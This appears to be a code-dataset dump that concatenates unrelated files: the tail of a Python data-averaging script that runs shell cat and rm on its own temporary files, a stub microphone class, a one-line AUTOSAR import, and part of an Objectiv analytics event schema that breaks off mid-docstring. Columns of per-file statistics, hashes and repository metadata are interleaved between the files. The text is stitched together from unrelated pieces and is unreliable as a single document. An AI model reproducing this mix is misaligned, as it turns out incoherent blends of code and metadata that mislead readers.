Switching after 1 h/OVERLAP10/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_1h_OVERLAP10.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "3. Switching after 1 h/OVERLAP10 no AC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "3. Switching after 1 h/OVERLAP10 no AC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "3. Switching after 1 h/OVERLAP10 no AC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_1h_OVERLAP10_noAC_noABC.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "3. Switching after 1 h/OVERLAP10 no BC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "3. Switching after 1 h/OVERLAP10 no BC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "3. 
Switching after 1 h/OVERLAP10 no BC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_1h_OVERLAP10_noBC_noABC.txt", remove_raw=True, sep_str='\n') os.system('cat "p_act_1h_NOOVERLAP.txt" > "p_act_summary_temp_1h.txt"') os.system('cat "p_act_1h_OVERLAP10.txt" >> "p_act_summary_temp_1h.txt"') os.system('cat "p_act_1h_OVERLAP10_noAC_noABC.txt" >> "p_act_summary_temp_1h.txt"') os.system('cat "p_act_1h_OVERLAP10_noBC_noABC.txt" >> "p_act_summary_temp_1h.txt"') os.system('rm -R -f "p_act_1h"*') mergeRawData(".", "p_act_summary_temp_", "p_act_summary_1h.txt", remove_raw=False, sep_str='\t') os.system('rm -f p_act_summary_temp_1h.txt') # 4 h averageFileColumns("p_act_averaged_Aprimed", "4. Switching after 4 h/NOOVERLAP/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "4. Switching after 4 h/NOOVERLAP/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "4. Switching after 4 h/NOOVERLAP/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_4h_NOOVERLAP.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "4. Switching after 4 h/OVERLAP10/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "4. Switching after 4 h/OVERLAP10/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "4. Switching after 4 h/OVERLAP10/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_4h_OVERLAP10.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "4. 
Switching after 4 h/OVERLAP10 no AC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "4. Switching after 4 h/OVERLAP10 no AC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "4. Switching after 4 h/OVERLAP10 no AC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_4h_OVERLAP10_noAC_noABC.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "4. Switching after 4 h/OVERLAP10 no BC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "4. Switching after 4 h/OVERLAP10 no BC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "4. Switching after 4 h/OVERLAP10 no BC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_4h_OVERLAP10_noBC_noABC.txt", remove_raw=True, sep_str='\n') os.system('cat "p_act_4h_NOOVERLAP.txt" > "p_act_summary_temp_4h.txt"') os.system('cat "p_act_4h_OVERLAP10.txt" >> "p_act_summary_temp_4h.txt"') os.system('cat "p_act_4h_OVERLAP10_noAC_noABC.txt" >> "p_act_summary_temp_4h.txt"') os.system('cat "p_act_4h_OVERLAP10_noBC_noABC.txt" >> "p_act_summary_temp_4h.txt"') os.system('rm -R -f "p_act_4h"*') mergeRawData(".", "p_act_summary_temp_", "p_act_summary_4h.txt", remove_raw=False, sep_str='\t') os.system('rm -f p_act_summary_temp_4h.txt') # 7 h averageFileColumns("p_act_averaged_Aprimed", "5. Switching after 7 h/NOOVERLAP/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "5. 
Switching after 7 h/NOOVERLAP/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "5. Switching after 7 h/NOOVERLAP/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_7h_NOOVERLAP.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "5. Switching after 7 h/OVERLAP10/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "5. Switching after 7 h/OVERLAP10/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "5. Switching after 7 h/OVERLAP10/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_7h_OVERLAP10.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "5. Switching after 7 h/OVERLAP10 no AC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "5. Switching after 7 h/OVERLAP10 no AC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "5. Switching after 7 h/OVERLAP10 no AC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_7h_OVERLAP10_noAC_noABC.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "5. Switching after 7 h/OVERLAP10 no BC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "5. 
Switching after 7 h/OVERLAP10 no BC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "5. Switching after 7 h/OVERLAP10 no BC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_7h_OVERLAP10_noBC_noABC.txt", remove_raw=True, sep_str='\n') os.system('cat "p_act_7h_NOOVERLAP.txt" > "p_act_summary_temp_7h.txt"') os.system('cat "p_act_7h_OVERLAP10.txt" >> "p_act_summary_temp_7h.txt"') os.system('cat "p_act_7h_OVERLAP10_noAC_noABC.txt" >> "p_act_summary_temp_7h.txt"') os.system('cat "p_act_7h_OVERLAP10_noBC_noABC.txt" >> "p_act_summary_temp_7h.txt"') os.system('rm -R -f "p_act_7h"*') mergeRawData(".", "p_act_summary_temp_", "p_act_summary_7h.txt", remove_raw=True, sep_str='\t') os.system('cp "./1. Priming/NOOVERLAP/A/"*/*"_PARAMS.txt" .')
66.644444
185
0.740191
2,832
17,994
4.401483
0.085099
0.041075
0.061613
0.115523
0.812836
0.803771
0.780345
0.775531
0.752106
0.730927
0
0.041032
0.106091
17,994
269
186
66.892193
0.733914
0.120096
0
0.198925
0
0
0.529389
0.317954
0
0
0
0
0
1
0.005376
false
0.016129
0.021505
0
0.026882
0.016129
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
984bf4d47f4e3b90155ff87bcaf2dff08b64ae08
252
py
Python
client/hardware_interface/microphone/base_mic.py
sgang007/audio_chat_client
e2c1caf6ec1a781be0d22f516e55434099514da1
[ "MIT" ]
null
null
null
client/hardware_interface/microphone/base_mic.py
sgang007/audio_chat_client
e2c1caf6ec1a781be0d22f516e55434099514da1
[ "MIT" ]
null
null
null
client/hardware_interface/microphone/base_mic.py
sgang007/audio_chat_client
e2c1caf6ec1a781be0d22f516e55434099514da1
[ "MIT" ]
null
null
null
class BaseMic(object):
    """No-op base class describing the microphone driver interface.

    Every lifecycle hook is a stub returning ``None``; concrete
    microphone implementations are expected to override them.
    """

    def __init__(self, *args, **kwargs):
        """Accept and ignore arbitrary arguments so subclasses may define their own constructor signatures."""

    def set(self):
        """Configure the microphone (stub)."""

    def tune(self):
        """Adjust capture parameters (stub)."""

    def listen(self):
        """Begin monitoring input (stub)."""

    def reset(self):
        """Restore the device to its initial state (stub)."""

    def record(self):
        """Capture audio (stub)."""
12.6
40
0.5
29
252
4.206897
0.482759
0.286885
0.360656
0
0
0
0
0
0
0
0
0
0.396825
252
19
41
13.263158
0.802632
0
0
0.461538
0
0
0
0
0
0
0
0
0
1
0.461538
false
0.461538
0
0
0.538462
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
6
984d45b81d44e03fe997fb440c7834ce7367d134
29
py
Python
src/__init.py
melodypapa/py-armodel
65a6a94a2b880d6b7cf43061c507761b3b9bc88a
[ "MIT" ]
2
2021-08-31T07:48:05.000Z
2022-03-30T19:04:08.000Z
src/__init.py
melodypapa/py-armodel
65a6a94a2b880d6b7cf43061c507761b3b9bc88a
[ "MIT" ]
null
null
null
src/__init.py
melodypapa/py-armodel
65a6a94a2b880d6b7cf43061c507761b3b9bc88a
[ "MIT" ]
1
2022-01-29T04:47:41.000Z
2022-01-29T04:47:41.000Z
from .ar_model import AUTOSAR
29
29
0.862069
5
29
4.8
1
0
0
0
0
0
0
0
0
0
0
0
0.103448
29
1
29
29
0.923077
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
98531634cad36d3bca5abd26b98c4081149f1af5
60,828
py
Python
backend/objectiv_backend/schema/schema.py
objectiv/objectiv-analytics
86ec1508f71c2d61ea7d67479800e4dc417a46e1
[ "Apache-2.0" ]
23
2021-11-10T21:37:42.000Z
2022-03-30T11:46:19.000Z
backend/objectiv_backend/schema/schema.py
objectiv/objectiv-analytics
86ec1508f71c2d61ea7d67479800e4dc417a46e1
[ "Apache-2.0" ]
163
2021-11-10T10:11:26.000Z
2022-03-31T16:04:27.000Z
backend/objectiv_backend/schema/schema.py
objectiv/objectiv-analytics
86ec1508f71c2d61ea7d67479800e4dc417a46e1
[ "Apache-2.0" ]
null
null
null
from typing import List, Dict, Any, Optional from abc import ABC from objectiv_backend.schema.schema_utils import SchemaEntity class AbstractContext(SchemaEntity, ABC): """ AbstractContext defines the bare minimum properties for every Context. All Contexts inherit from it. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'AbstractContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ SchemaEntity.__init__(self, id=id, **kwargs) class AbstractGlobalContext(AbstractContext, ABC): """ This is the abstract parent of all Global Contexts. Global contexts add general information to an Event. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'AbstractGlobalContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractContext.__init__(self, id=id, **kwargs) class ApplicationContext(AbstractGlobalContext): """ A GlobalContext describing in which app the event happens, like a website or iOS app. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'ApplicationContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractGlobalContext.__init__(self, id=id, **kwargs) class CookieIdContext(AbstractGlobalContext): """ Global context with information needed to reconstruct a user session. 
Attributes: cookie_id (str): Unique identifier from the session cookie id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'CookieIdContext' def __init__(self, cookie_id: str, id: str, **kwargs: Optional[Any]): """ :param cookie_id: Unique identifier from the session cookie :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractGlobalContext.__init__( self, cookie_id=cookie_id, id=id, **kwargs) class HttpContext(AbstractGlobalContext): """ A GlobalContext describing meta information about the agent that sent the event. Attributes: referrer (str): Full URL to HTTP referrer of the current page. user_agent (str): User-agent of the agent that sent the event. remote_address (str): (public) IP address of the agent that sent the event. id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'HttpContext' def __init__(self, referrer: str, user_agent: str, id: str, remote_address: str = None, **kwargs: Optional[Any]): """ :param referrer: Full URL to HTTP referrer of the current page. :param user_agent: User-agent of the agent that sent the event. :param remote_address: (public) IP address of the agent that sent the event. :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractGlobalContext.__init__(self, referrer=referrer, user_agent=user_agent, remote_address=remote_address, id=id, **kwargs) class PathContext(AbstractGlobalContext): """ A GlobalContext describing the path where the user is when an event is sent. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. 
""" _type = 'PathContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractGlobalContext.__init__(self, id=id, **kwargs) class SessionContext(AbstractGlobalContext): """ A GlobalContext describing meta information about the current session. Attributes: hit_number (int): Hit counter relative to the current session, this event originated in. id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'SessionContext' def __init__(self, hit_number: int, id: str, **kwargs: Optional[Any]): """ :param hit_number: Hit counter relative to the current session, this event originated in. :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractGlobalContext.__init__( self, hit_number=hit_number, id=id, **kwargs) class MarketingContext(AbstractGlobalContext): """ a context that captures marketing channel info, so users can do attribution, campaign effectiveness and other models Attributes: source (str): Identifies the advertiser, site, publication, etc medium (str): Advertising or marketing medium: cpc, banner, email newsletter, etc campaign (str): Individual campaign name, slogan, promo code, etc term (str): [Optional] Search keywords content (str): [Optional] Used to differentiate similar content, or links within the same ad source_platform (str): [Optional] To differentiate similar content, or links within the same ad. creative_format (str): [Optional] Identifies the creative used (e.g., skyscraper, banner, etc). marketing_tactic (str): [Optional] Identifies the marketing tactic used (e.g., onboarding, retention, acquisition etc). id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. 
""" _type = 'MarketingContext' def __init__(self, source: str, medium: str, campaign: str, id: str, term: str = None, content: str = None, source_platform: str = None, creative_format: str = None, marketing_tactic: str = None, **kwargs: Optional[Any]): """ :param source: Identifies the advertiser, site, publication, etc :param medium: Advertising or marketing medium: cpc, banner, email newsletter, etc :param campaign: Individual campaign name, slogan, promo code, etc :param term: [Optional] Search keywords :param content: [Optional] Used to differentiate similar content, or links within the same ad :param source_platform: [Optional] To differentiate similar content, or links within the same ad. :param creative_format: [Optional] Identifies the creative used (e.g., skyscraper, banner, etc). :param marketing_tactic: [Optional] Identifies the marketing tactic used (e.g., onboarding, retention, acquisition etc). :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractGlobalContext.__init__(self, source=source, medium=medium, campaign=campaign, term=term, content=content, source_platform=source_platform, creative_format=creative_format, marketing_tactic=marketing_tactic, id=id, **kwargs) class AbstractLocationContext(AbstractContext, ABC): """ AbstractLocationContext are the abstract parents of all Location Contexts. Location Contexts are meant to describe where an event originated from in the visual UI. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'AbstractLocationContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. 
""" AbstractContext.__init__(self, id=id, **kwargs) class InputContext(AbstractLocationContext): """ A Location Context that describes an element that accepts user input, i.e. a form field. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'InputContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class PressableContext(AbstractLocationContext): """ An Location Context that describes an interactive element (like a link, button, icon), that the user can press and will trigger an Interactive Event. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'PressableContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class LinkContext(PressableContext): """ A PressableContext that contains an href. Attributes: href (str): URL (href) the link points to. id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'LinkContext' def __init__(self, href: str, id: str, **kwargs: Optional[Any]): """ :param href: URL (href) the link points to. :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ PressableContext.__init__(self, href=href, id=id, **kwargs) class RootLocationContext(AbstractLocationContext): """ A Location Context that uniquely represents the top-level UI location of the user. 
Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'RootLocationContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class ExpandableContext(AbstractLocationContext): """ A Location Context that describes a section of the UI that can expand & collapse. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'ExpandableContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class MediaPlayerContext(AbstractLocationContext): """ A Location Context that describes a section of the UI containing a media player. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'MediaPlayerContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class NavigationContext(AbstractLocationContext): """ A Location Context that describes a section of the UI containing navigational elements, for example a menu. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'NavigationContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. 
""" AbstractLocationContext.__init__(self, id=id, **kwargs) class OverlayContext(AbstractLocationContext): """ A Location Context that describes a section of the UI that represents an overlay, i.e. a Modal. . Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'OverlayContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class ContentContext(AbstractLocationContext): """ A Location Context that describes a logical section of the UI that contains other Location Contexts. Enabling Data Science to analyze this section specifically. Attributes: id (str): A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ _type = 'ContentContext' def __init__(self, id: str, **kwargs: Optional[Any]): """ :param id: A unique string identifier to be combined with the Context Type (`_type`) for Context instance uniqueness. """ AbstractLocationContext.__init__(self, id=id, **kwargs) class AbstractEvent(SchemaEntity, ABC): """ This is the abstract parent of all Events. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. 
On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'AbstractEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ SchemaEntity.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class InteractiveEvent(AbstractEvent): """ The parent of Events that are the direct result of a user interaction, e.g. a button click. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. 
id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'InteractiveEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ AbstractEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class NonInteractiveEvent(AbstractEvent): """ The parent of Events that are not directly triggered by a user action. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. 
They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'NonInteractiveEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ AbstractEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class ApplicationLoadedEvent(NonInteractiveEvent): """ A NonInteractive event that is emitted after an application (eg. SPA) has finished loading. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. 
The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'ApplicationLoadedEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ NonInteractiveEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class FailureEvent(NonInteractiveEvent): """ A NonInteractiveEvent that is sent when a user action results in a error, like an invalid email when sending a form. Attributes: message (str): Failure message. 
location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'FailureEvent' def __init__(self, message: str, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param message: Failure message. :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. 
:param time: Timestamp indicating when the event was generated """ NonInteractiveEvent.__init__(self, message=message, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class InputChangeEvent(InteractiveEvent): """ Event triggered when user input is modified. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'InputChangeEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. 
On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ InteractiveEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class PressEvent(InteractiveEvent): """ An InteractiveEvent that is sent when a user presses on a pressable element (like a link, button, icon). Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'PressEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to 